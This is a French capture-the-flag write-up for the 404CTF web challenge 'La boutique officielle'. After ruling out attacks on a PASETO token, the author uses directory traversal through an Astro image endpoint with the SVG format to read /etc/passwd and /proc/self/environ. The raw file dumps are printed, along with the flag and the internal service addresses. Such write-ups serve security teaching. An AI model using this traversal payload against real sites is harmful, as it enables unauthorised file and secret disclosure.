La boutique officielle
=================================

Enoncé
-----------

Enfin ! Les billets pour la Cérémonie de Clôture des 404 Travaux du Hacker sont en vente sur la boutique officielle de l'événement. Le prix est peut-être un peu haut, mais tant pis. Vous avez déjà fait l'acquisition de l'une de ces étranges mascottes en forme de... bref ! Tout ça pour dire que ce n'est pas l'argent qui compte : une occasion comme ça, il ne faut pas la louper ! Allez, dépêchez-vous, j'ai le sentiment que vous n'êtes pas le seul à être intéressé

Auteur : Artamis


Résolution
--------------

On commence par regardé le site, comme d'habitude

On arrive rapidement sur une file d'attente avec un jeton en base 64 : 

.. code-block:: console

    v4.public.eyJuYW1lIjoiYSIsInBvc2l0aW9uIjozMjIxLCJlbnF1ZXVlVGltZSI6IjIwMjQtMDUtMDlUMTE6MTk6MDQuNTI3WiIsImlhdCI6IjIwMjQtMDUtMDlUMjM6Mjk6NTQuMjI0WiJ9bxDovy8xny49IHe-bSZ1GoWm2aa29uBehvBjhSpA70B54n5SkOP-wosSZiQJ1blNLbJ-fLSNoJ4bZfACEABZCQ
    {"name":"a","position":3221,"enqueueTime":"2024-05-09T11:19:04.527Z","iat":"2024-05-09T23:29:54.224Z"}o/1.= wm&u٦^c*@@y~R‹f$	չM-~|e�Y	 # La partie base64 décodé


Ca ressemble à un JWT, mais c'est pas un JWT.

En cherchant "token v4.public" dans google, on tombe sur ça : https://github.com/paseto-standard/paseto-spec/blob/master/docs/01-Protocol-Versions/Version4.md

En lisant la documentation, on se dit que ça va pas être facile de l'attaquer, et qu'il faudrait retrouver la clé RSA privée.

Franchement, et après quelques test, ça me semble inattaquable sans la clé. 

Donc on va allez voir ailleurs !

Le tag image me semble vraiment étrange : 

.. code-block:: console

    <img src="/_image?href=%2F_astro%2Fhiking.DKsy_O4r.jpg&amp;w=600&amp;f=webp" alt="Un randonneur en montagne" class="darkmode--ignore w-full rounded-lg" width="600" height="801" loading="lazy" decoding="async">

J'ai rarement vu des images dont la source est un ?href, on va allez voir ça ! 

Quand on tente la LFI, on obtient une erreur particulière : 

- https://la-boutique-officielle.challenges.404ctf.fr/_image?href=../../../../../../../../../etc/passwd&w=600&f=webp
- Server Error: Error: Input buffer contains unsupported image format

Si on change le format, webp a la fin on obtient ceci : 
- https://la-boutique-officielle.challenges.404ctf.fr/_image?href=../../../../../../../../../etc/passwd&w=600&f=txt
- Server Error: Error: Expected one of: heic, heif, avif, jpeg, jpg, jpe, tile, dz, png, raw, tiff, tif, webp, gif, jp2, jpx, j2k, j2c, jxl for format but received txt of type string

On a beau tenté de nombreux format, rien ne passe, impossible de mettre plusieurs format non plus. 

On a tenté de récupérer des images qui pourrait passer comme des fichiers image comme /bin/bash, les clés rsa ou ce genre de chose mais rien n'y fait ! 

Finalement, un peu par hasard et en parcourant la doc d'Astro : https://docs.astro.build/fr/reference/image-service-reference/ 

Puis en allant sur d'autres page, on se dit qu'on va tenter d'autre format. 

On va donc tester SVG : 

- https://la-boutique-officielle.challenges.404ctf.fr/_image?href=../../../../../../../../../etc/passwd&w=600&f=txt

.. code-block:: console

    This page contains the following errors:
    error on line 1 at column 1: Start tag expected, '<' not founderror on line 1 at column 1: Encoding error
    Below is a rendering of the page up to the first error.

Oh la on se dit qu'on tient quelque chose !! 

Et en regardant le code de la page : 

.. code-block:: console


    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
    _apt:x:42:65534::/nonexistent:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin


Bingo ! 

On va donc chercher a obtenir d'autre fichier intéressants

https://github.com/DragonJAR/Security-Wordlist/blob/main/LFI-WordList-Linux

On va donc cherher les variables d'environnement, les flags sont souvent la : /proc/self/environ

Et c'est le bingo on obtient le flag ! 

.. code-block:: console 

    
    JAIGLISSECHEF_PORT_4000_TCP_ADDR=10.3.143.41SERVICE_3_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_PORT=4000SERVICE_3_REVERSIBLE_ENGINEERING_2_SERVICE_HOST=10.3.42.192KUBERNETES_SERVICE_PORT_HTTPS=443COUP_DE_CIRCUIT_C2_PORT_1337_TCP_PROTO=tcpSERVICE_MATCH_DU_SIECLE_BACK_PORT_8000_TCP=tcp://10.3.221.220:8000VAGUE2_LABRASSEOULEPAPILLON_PORT_4000_TCP_ADDR=10.3.157.118SERVICE_MATCH_DU_SIECLE_FRONT_SERVICE_HOST=10.3.118.154SERVICE_1_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP=tcp://10.3.178.174:4000JEPONGEDONCJESSUIE_PORT_4000_TCP=tcp://10.3.229.51:4000SERVICE_1_REVERSIBLE_ENGINEERING_2_PORT=tcp://10.3.122.189:4000KUBERNETES_SERVICE_PORT=443SERVICE_DU_POISON_SERVICE_PORT=80LE_GORFOU_42_SERVICE_PORT_80_TCP_PORT=80SERVICE_CONVSERSATION_CAFE_PORT_80_TCP_ADDR=10.3.131.7RICKROLL_FLAG_NGINX_SERVICE_PORT=80VAGUE2_ZACK_ADEAUX_PORT_4000_TCP_PORT=4000VAGUE2_ZACK_ADEAUX_NODEPORT_SERVICE_PORT=4000SERVICE_PERCEVAL_SERVICE_PORT=80REVERSIBLE_ENGINEERING_0_PORT_9997_TCP=tcp://10.3.13.156:9997JAIGLISSECHEFREVANCHE_SERVICE_PORT=4000RICKROLL_FLAG_NGINX_PORT_80_TCP_PROTO=tcpLE_GORFOU_42_SERVICE_PORT_80_TCP=tcp://10.3.31.79:80SEA_SERVICE_PORT_TCP=4000VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_SERVICE_PORT_TCP=4000SERVICE_DU_POISON_PORT_80_TCP=tcp://10.3.11.141:80HOSTNAME=la-boutique-officielle-7df8b8ff7d-pltnfSEA_PORT=tcp://10.3.19.226:4000JAIGLISSECHEF_PORT_4000_TCP_PORT=4000VAGUE2_ZACK_ADEAUX_NODEPORT_SERVICE_PORT_TCP=4000LE_GORFOU_42_SERVICE_SERVICE_HOST=10.3.31.79SERVICE_2_REVERSIBLE_ENGINEERING_1_PORT=tcp://10.3.201.121:4000SERVICE_3_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP=tcp://10.3.42.192:4000SERVICE_2_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP_ADDR=10.3.201.121VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_PORT_4000_TCP_PORT=4000VAGUE2_ZACK_ADEAUX_NODEPORT_PORT_4000_TCP_ADDR=10.3.23.17REVERSIBLE_ENGINEERING_0_NODEPORT_PORT=tcp://10.3.117.190:9997SERVICE_1_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_PROTO=tcpJAIGLISSECHEF_PORT_4000_TCP=tcp://10.3.143.41:4000VAGUE2_ZACK_ADEAUX_SERVICE_HOST=10.3.5.166JAIGLISSECHEFREVANCHE_PORT_4000_TCP_PROTO=tcpSALADE_TOMATE_OIGNON_SERVICE_HOST=10.3.122.80JAIGLISSECHEFREVANCHE_SERVICE_PORT_TCP=4000LE_GORFOU_42_SERVICE_PORT_80_TCP_PROTO=tcpSALADE_TOMATE_OIGNON_PORT=tcp://10.3.122.80:4000REVERSIBLE_ENGINEERING_0_SERVICE_PORT_TCP=9997SERVICE_1_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP_PROTO=tcpSERVICE_CONVSERSATION_CAFE_PORT_80_TCP=tcp://10.3.131.7:80SERVICE_DU_POISON_PORT_80_TCP_PORT=80COUP_DE_CIRCUIT_C2_PORT_1337_TCP_PORT=1337SERVICE_2_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP=tcp://10.3.201.121:4000SERVICE_1_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_ADDR=10.3.122.189SERVICE_CONVSERSATION_CAFE_SERVICE_PORT=80SERVICE_1_REVERSIBLE_ENGINEERING_1_SERVICE_PORT=4000SERVICE_CONVSERSATION_CAFE_SERVICE_PORT_HTTP=80SERVICE_MATCH_DU_SIECLE_FRONT_PORT_3000_TCP_PORT=3000JAIGLISSECHEFREVANCHE_PORT=tcp://10.3.59.166:4000SALADE_TOMATE_OIGNON_PORT_4000_TCP_ADDR=10.3.122.80SALADE_TOMATE_OIGNON_NODEPORT_PORT_4000_TCP_PORT=4000JEPONGEDONCJESSUIE_SERVICE_PORT=4000SERVICE_2_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP_PORT=4000EXPLOIT_MAG_PORT=tcp://10.3.115.8:4321VAGUE2_ZACK_ADEAUX_NODEPORT_PORT_4000_TCP_PORT=4000LA_BOUTIQUE_OFFICIELLE_SERVICE_PORT_HTTP=4321COUP_DE_CIRCUIT_C2_NODEPORT_PORT_1337_TCP_PORT=1337SERVICE_1_REVERSIBLE_ENGINEERING_1_SERVICE_PORT_TCP1=4000PWD=/appEXPLOIT_MAG_PORT_4321_TCP_PORT=4321VAGUE2_LABRASSEOULEPAPILLON_SERVICE_PORT_TCP=4000OS_FLAVOUR=debian-12SALADE_TOMATE_OIGNON_NODEPORT_SERVICE_HOST=10.3.167.183VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_PORT_4000_TCP=tcp://10.3.59.15:4000SERVICE_PERCEVAL_SERVICE_HOST=10.3.170.46VAGUE2_ZACK_ADEAUX_SERVICE_PORT=4000EXPLOIT_MAG_PORT_4321_TCP_ADDR=10.3.115.8PORT=4321JAIGLISSECHEF_SERVICE_HOST=10.3.143.41SERVICE_1_REVERSIBLE_ENGINEERING_2_SERVICE_PORT=4000VAGUE2_LABRASSEOULEPAPILLON_SERVICE_HOST=10.3.157.118VAGUE2_LABRASSEOULEPAPILLON_PORT=tcp://10.3.157.118:4000SEA_PORT_4000_TCP_PORT=4000SERVICE_1_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_PORT=4000SALADE_TOMATE_OIGNON_PORT_4000_TCP_PROTO=tcpSERVICE_MATCH_DU_SIECLE_FRONT_SERVICE_PORT_HTTP=3000COUP_DE_CIRCUIT_C2_PORT_5000_TCP_PORT=5000COUP_DE_CIRCUIT_C2_NODEPORT_SERVICE_HOST=10.3.85.1JEPONGEDONCJESSUIE_SERVICE_PORT_TCP=4000SALADE_TOMATE_OIGNON_PORT_4000_TCP_PORT=4000SERVICE_2_REVERSIBLE_ENGINEERING_1_SERVICE_HOST=10.3.201.121SERVICE_PERCEVAL_PORT_80_TCP_PORT=80SERVICE_MATCH_DU_SIECLE_BACK_PORT_8000_TCP_PROTO=tcpSERVICE_1_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP_ADDR=10.3.178.174SERVICE_PERCEVAL_PORT_80_TCP_ADDR=10.3.170.46LA_BOUTIQUE_OFFICIELLE_PORT=tcp://10.3.50.155:4321SERVICE_3_REVERSIBLE_ENGINEERING_2_SERVICE_PORT=4000HOME=/nonexistentEN_RETARD_SERVICE_PORT_80_TCP_PROTO=tcpSERVICE_MATCH_DU_SIECLE_FRONT_PORT=tcp://10.3.118.154:3000LE_TABEAU_NOIR_PORT_8080_TCP=tcp://10.3.148.115:8080KUBERNETES_PORT_443_TCP=tcp://10.3.0.1:443REVERSIBLE_ENGINEERING_0_PORT=tcp://10.3.13.156:9997VAGUE2_ZACK_ADEAUX_PORT_4000_TCP_ADDR=10.3.5.166JEPONGEDONCJESSUIE_PORT_4000_TCP_ADDR=10.3.229.51VAGUE2_ZACK_ADEAUX_NODEPORT_SERVICE_HOST=10.3.23.17SERVICE_1_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP=tcp://10.3.122.189:4000SERVICE_1_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP_PORT=4000SERVICE_CONVSERSATION_CAFE_PORT=tcp://10.3.131.7:80SERVICE_DU_POISON_PORT_80_TCP_PROTO=tcpSEA_PORT_4000_TCP_PROTO=tcpJEPONGEDONCJESSUIE_PORT=tcp://10.3.229.51:4000EXPLOIT_MAG_PORT_4321_TCP=tcp://10.3.115.8:4321SALADE_TOMATE_OIGNON_NODEPORT_SERVICE_PORT=4000REVERSIBLE_ENGINEERING_0_NODEPORT_SERVICE_PORT=9997LA_BOUTIQUE_OFFICIELLE_PORT_4321_TCP_ADDR=10.3.50.155LE_GORFOU_42_SERVICE_SERVICE_PORT=80SERVICE_PERCEVAL_PORT_80_TCP=tcp://10.3.170.46:80JAIGLISSECHEF_PORT=tcp://10.3.143.41:4000LE_GORFOU_42_SERVICE_PORT=tcp://10.3.31.79:80RICKROLL_FLAG_NGINX_SERVICE_HOST=10.3.140.203COUP_DE_CIRCUIT_C2_PORT_1337_TCP=tcp://10.3.184.197:1337SERVICE_DU_POISON_SERVICE_PORT_HTTP=80SERVICE_MATCH_DU_SIECLE_FRONT_PORT_3000_TCP_PROTO=tcpSALADE_TOMATE_OIGNON_SERVICE_PORT_TCP=4000JAIGLISSECHEF_PORT_4000_TCP_PROTO=tcpSEA_PORT_4000_TCP_ADDR=10.3.19.226SERVICE_3_REVERSIBLE_ENGINEERING_2_SERVICE_PORT_TCP3=4000VAGUE2_LABRASSEOULEPAPILLON_PORT_4000_TCP_PROTO=tcpSERVICE_DU_POISON_PORT=tcp://10.3.11.141:80VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_PORT_4000_TCP_ADDR=10.3.59.15JAIGLISSECHEFREVANCHE_SERVICE_HOST=10.3.59.166VAGUE2_ZACK_ADEAUX_NODEPORT_PORT_4000_TCP=tcp://10.3.23.17:4000COUP_DE_CIRCUIT_C2_NODEPORT_SERVICE_PORT_C2=1337COUP_DE_CIRCUIT_C2_NODEPORT_PORT_1337_TCP_ADDR=10.3.85.1FLAG=404CTF{Sh0uld_Th1s_B3_a_CVE_?}EN_RETARD_SERVICE_PORT_80_TCP_PORT=80TICKET_PDF_URL=/app/ticket.pdfLE_TABEAU_NOIR_SERVICE_PORT_HTTP=8080SERVICE_MATCH_DU_SIECLE_FRONT_SERVICE_PORT=3000LA_BOUTIQUE_OFFICIELLE_PORT_4321_TCP_PORT=4321EN_RETARD_SERVICE_PORT_80_TCP_ADDR=10.3.68.230VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_PORT=tcp://10.3.59.15:4000JAIGLISSECHEFREVANCHE_PORT_4000_TCP=tcp://10.3.59.166:4000VAGUE2_ZACK_ADEAUX_PORT=tcp://10.3.5.166:4000EXPLOIT_MAG_SERVICE_PORT_HTTP=4321SERVICE_2_REVERSIBLE_ENGINEERING_1_PORT_4000_TCP_PROTO=tcpVAGUE2_ZACK_ADEAUX_NODEPORT_PORT=tcp://10.3.23.17:4000COUP_DE_CIRCUIT_C2_PORT_1337_TCP_ADDR=10.3.184.197LA_BOUTIQUE_OFFICIELLE_PORT_4321_TCP=tcp://10.3.50.155:4321REVERSIBLE_ENGINEERING_0_NODEPORT_PORT_9997_TCP=tcp://10.3.117.190:9997REVERSIBLE_ENGINEERING_0_PORT_9997_TCP_PROTO=tcpREVERSIBLE_ENGINEERING_0_SERVICE_HOST=10.3.13.156VAGUE2_LABRASSEOULEPAPILLON_PORT_4000_TCP_PORT=4000COUP_DE_CIRCUIT_C2_NODEPORT_PORT=tcp://10.3.85.1:1337EN_RETARD_SERVICE_SERVICE_PORT=80EN_RETARD_SERVICE_PORT=tcp://10.3.68.230:80EXPLOIT_MAG_PORT_4321_TCP_PROTO=tcpJEPONGEDONCJESSUIE_PORT_4000_TCP_PORT=4000COUP_DE_CIRCUIT_C2_PORT_5000_TCP_ADDR=10.3.184.197SERVICE_2_REVERSIBLE_ENGINEERING_2_SERVICE_HOST=10.3.229.47SERVICE_CONVSERSATION_CAFE_SERVICE_HOST=10.3.131.7HOST=0.0.0.0VAGUE2_ZACK_ADEAUX_PORT_4000_TCP_PROTO=tcpSERVICE_MATCH_DU_SIECLE_BACK_PORT_8000_TCP_ADDR=10.3.221.220LE_TABEAU_NOIR_PORT=tcp://10.3.148.115:8080SEA_SERVICE_PORT=4000SERVICE_CONVSERSATION_CAFE_PORT_80_TCP_PORT=80SERVICE_2_REVERSIBLE_ENGINEERING_1_SERVICE_PORT_TCP2=4000SERVICE_DU_POISON_PORT_80_TCP_ADDR=10.3.11.141LA_BOUTIQUE_OFFICIELLE_PORT_4321_TCP_PROTO=tcpVAGUE2_LABRASSEOULEPAPILLON_NODEPORT_SERVICE_HOST=10.3.59.15SERVICE_1_REVERSIBLE_ENGINEERING_1_SERVICE_HOST=10.3.178.174VAGUE2_ZACK_ADEAUX_SERVICE_PORT_TCP=4000VAGUE2_LABRASSEOULEPAPILLON_SERVICE_PORT=4000SHLVL=0LA_BOUTIQUE_OFFICIELLE_SERVICE_HOST=10.3.50.155SALADE_TOMATE_OIGNON_NODEPORT_SERVICE_PORT_TCP=4000COUP_DE_CIRCUIT_C2_PORT_5000_TCP=tcp://10.3.184.197:5000COUP_DE_CIRCUIT_C2_SERVICE_PORT_C2=1337REVERSIBLE_ENGINEERING_0_PORT_9997_TCP_PORT=9997LE_TABEAU_NOIR_SERVICE_HOST=10.3.148.115SERVICE_3_REVERSIBLE_ENGINEERING_2_PORT=tcp://10.3.42.192:4000KUBERNETES_PORT_443_TCP_PROTO=tcpCOUP_DE_CIRCUIT_C2_NODEPORT_PORT_1337_TCP=tcp://10.3.85.1:1337SERVICE_2_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_PORT=4000SERVICE_MATCH_DU_SIECLE_BACK_PORT_8000_TCP_PORT=8000SALADE_TOMATE_OIGNON_NODEPORT_PORT_4000_TCP_PROTO=tcpREVERSIBLE_ENGINEERING_0_SERVICE_PORT=9997LA_BOUTIQUE_OFFICIELLE_SERVICE_PORT=4321BITNAMI_APP_NAME=nodeREVERSIBLE_ENGINEERING_0_PORT_9997_TCP_ADDR=10.3.13.156RICKROLL_FLAG_NGINX_PORT_80_TCP_PORT=80COUP_DE_CIRCUIT_C2_SERVICE_PORT=5000SERVICE_MATCH_DU_SIECLE_BACK_SERVICE_PORT_HTTP=8000KUBERNETES_PORT_443_TCP_ADDR=10.3.0.1SERVICE_PERCEVAL_SERVICE_PORT_HTTP=80EN_RETARD_SERVICE_SERVICE_HOST=10.3.68.230EXPLOIT_MAG_SERVICE_PORT=4321APP_VERSION=20.12.2SERVICE_3_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_PROTO=tcpSERVICE_2_REVERSIBLE_ENGINEERING_1_SERVICE_PORT=4000EN_RETARD_SERVICE_PORT_80_TCP=tcp://10.3.68.230:80LE_GORFOU_42_SERVICE_SERVICE_PORT_HTTP=80LE_TABEAU_NOIR_PORT_8080_TCP_PORT=8080SERVICE_3_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_ADDR=10.3.42.192SALADE_TOMATE_OIGNON_NODEPORT_PORT=tcp://10.3.167.183:4000COUP_DE_CIRCUIT_C2_NODEPORT_SERVICE_PORT=1337JEPONGEDONCJESSUIE_PORT_4000_TCP_PROTO=tcpCOUP_DE_CIRCUIT_C2_SERVICE_HOST=10.3.184.197JAIGLISSECHEFREVANCHE_PORT_4000_TCP_ADDR=10.3.59.166KUBERNETES_SERVICE_HOST=10.3.0.1RICKROLL_FLAG_NGINX_PORT_80_TCP=tcp://10.3.140.203:80SEA_SERVICE_HOST=10.3.19.226VAGUE2_ZACK_ADEAUX_NODEPORT_PORT_4000_TCP_PROTO=tcpSERVICE_PERCEVAL_PORT_80_TCP_PROTO=tcpEXPLOIT_MAG_SERVICE_HOST=10.3.115.8KUBERNETES_PORT=tcp://10.3.0.1:443JEPONGEDONCJESSUIE_SERVICE_HOST=10.3.229.51KUBERNETES_PORT_443_TCP_PORT=443SALADE_TOMATE_OIGNON_NODEPORT_PORT_4000_TCP_ADDR=10.3.167.183SERVICE_2_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_ADDR=10.3.229.47SALADE_TOMATE_OIGNON_SERVICE_PORT=4000LE_TABEAU_NOIR_SERVICE_PORT=8080COUP_DE_CIRCUIT_C2_SERVICE_PORT_HTTP=5000REVERSIBLE_ENGINEERING_0_NODEPORT_SERVICE_PORT_TCP=9997REVERSIBLE_ENGINEERING_0_NODEPORT_PORT_9997_TCP_PORT=9997REVERSIBLE_ENGINEERING_0_NODEPORT_SERVICE_HOST=10.3.117.190OS_NAME=linuxSEA_PORT_4000_TCP=tcp://10.3.19.226:4000RICKROLL_FLAG_NGINX_PORT_80_TCP_ADDR=10.3.140.203PATH=/opt/bitnami/python/bin:/opt/bitnami/node/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binSERVICE_MATCH_DU_SIECLE_FRONT_PORT_3000_TCP_ADDR=10.3.118.154VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_PORT_4000_TCP_PROTO=tcpRICKROLL_FLAG_NGINX_PORT=tcp://10.3.140.203:80SERVICE_2_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP_PROTO=tcpREVERSIBLE_ENGINEERING_0_NODEPORT_PORT_9997_TCP_ADDR=10.3.117.190VAGUE2_LABRASSEOULEPAPILLON_NODEPORT_SERVICE_PORT=4000SALADE_TOMATE_OIGNON_PORT_4000_TCP=tcp://10.3.122.80:4000SERVICE_2_REVERSIBLE_ENGINEERING_2_PORT_4000_TCP=tcp://10.3.229.47:4000SERVICE_MATCH_DU_SIECLE_BACK_SERVICE_HOST=10.3.221.220SERVICE_DU_POISON_SERVICE_HOST=10.3.11.141SERVICE_MATCH_DU_SIECLE_BACK_SERVICE_PORT=8000REVERSIBLE_ENGINEERING_0_NODEPORT_PORT_9997_TCP_PROTO=tcpCOUP_DE_CIRCUIT_C2_PORT_5000_TCP_PROTO=tcpSERVICE_MATCH_DU_SIECLE_BACK_PORT=tcp://10.3.221.220:8000SERVICE_2_REVERSIBLE_ENGINEERING_2_SERVICE_PORT_TCP2=4000COUP_DE_CIRCUIT_C2_NODEPORT_PORT_1337_TCP_PROTO=tcpVAGUE2_ZACK_ADEAUX_PORT_4000_TCP=tcp://10.3.5.166:4000SERVICE_CONVSERSATION_CAFE_PORT_80_TCP_PROTO=tcpVAGUE2_LABRASSEOULEPAPILLON_PORT_4000_TCP=tcp://10.3.157.118:4000JAIGLISSECHEF_SERVICE_PORT=4000JAIGLISSECHEFREVANCHE_PORT_4000_TCP_PORT=4000LE_TABEAU_NOIR_PORT_8080_TCP_PROTO=tcpLE_GORFOU_42_SERVICE_PORT_80_TCP_ADDR=10.3.31.79SERVICE_2_REVERSIBLE_ENGINEERING_2_SERVICE_PORT=4000EN_RETARD_SERVICE_SERVICE_PORT_HTTP=80SERVICE_1_REVERSIBLE_ENGINEERING_2_SERVICE_PORT_TCP1=4000SERVICE_2_REVERSIBLE_ENGINEERING_2_PORT=tcp://10.3.229.47:4000SERVICE_PERCEVAL_PORT=tcp://10.3.170.46:80SERVICE_1_REVERSIBLE_ENGINEERING_1_PORT=tcp://10.3.178.174:4000SERVICE_1_REVERSIBLE_ENGINEERING_2_SERVICE_HOST=10.3.122.189JAIGLISSECHEF_SERVICE_PORT_TCP=4000SERVICE_MATCH_DU_SIECLE_FRONT_PORT_3000_TCP=tcp://10.3.118.154:3000OS_ARCH=amd64COUP_DE_CIRCUIT_C2_PORT=tcp://10.3.184.197:5000RICKROLL_FLAG_NGINX_SERVICE_PORT_HTTP=80SALADE_TOMATE_OIGNON_NODEPORT_PORT_4000_TCP=tcp://10.3.167.183:4000LE_TABEAU_NOIR_PORT_8080_TCP_ADDR=10.3.148.115_=/opt/bitnami/node/bin/node

Et la dedans on retrouve notre flag : **404CTF{Sh0uld_Th1s_B3_a_CVE_?}**

Et on finira notamment TOP 5 sur la validation de ce chall !